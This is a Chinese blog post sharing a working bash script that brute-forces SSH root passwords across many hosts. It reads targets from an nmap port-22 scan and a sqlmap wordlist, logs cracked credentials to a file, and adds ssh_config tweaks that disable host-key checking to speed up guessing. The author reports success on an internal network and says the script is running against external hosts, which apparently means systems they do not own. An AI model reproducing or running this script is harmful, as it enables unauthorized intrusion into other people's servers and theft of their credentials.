暴力破解脚本 shell

本文介绍了一种使用Shell脚本进行大规模SSH登录暴力破解的方法。作者利用nmap扫描开放的SSH端口,并借助sqlmap提供的字典文件进行密码猜测。此外,还详细介绍了如何配置ssh客户端以提高破解效率。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

突然间懵生了一个想法 然后就做了(第一次觉得工作这么有趣!!!) 内网已经测试能够成功 外网正在测试,字典比较大估计要跑好几天

先把脚本贴出来:

#!bin/bash
gateway=172.16.80
#nmap -p 22 172.16.81.* |grep open -a3 |grep for|cut -d " " -f5 >hosts
hosts=`cat hosts`
pass=`cat wordlist.txt`
#sshpass -p "yuan" ssh root@172.16.81.73 "ls"
#[ $? == 0 ] && echo "the server is ok "
for i in $hosts; do
	echo "正在准备请稍后"
	for p in $pass; do
		echo "server is $i passwd is $p"
		sshpass -p "$p" ssh root@$i "ls"
		[ $? == 0 ] && echo "这台server $i已经破解 $p" >>server 2>&1
	done
done




hosts 是通过nmap 扫描出来22端口为开启状态的主机

wordlist.txt 是sqlmap自带的暴力破解字典 大概11M左右


ssh_config 添加配置:

StrictHostKeyChecking no
Compression yes
ServerAliveInterval 60
ServerAliveCountMax 5
ControlMaster auto
ControlPath ~/.ssh/sockets/%r@%h-%p
ControlPersist 4h



评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值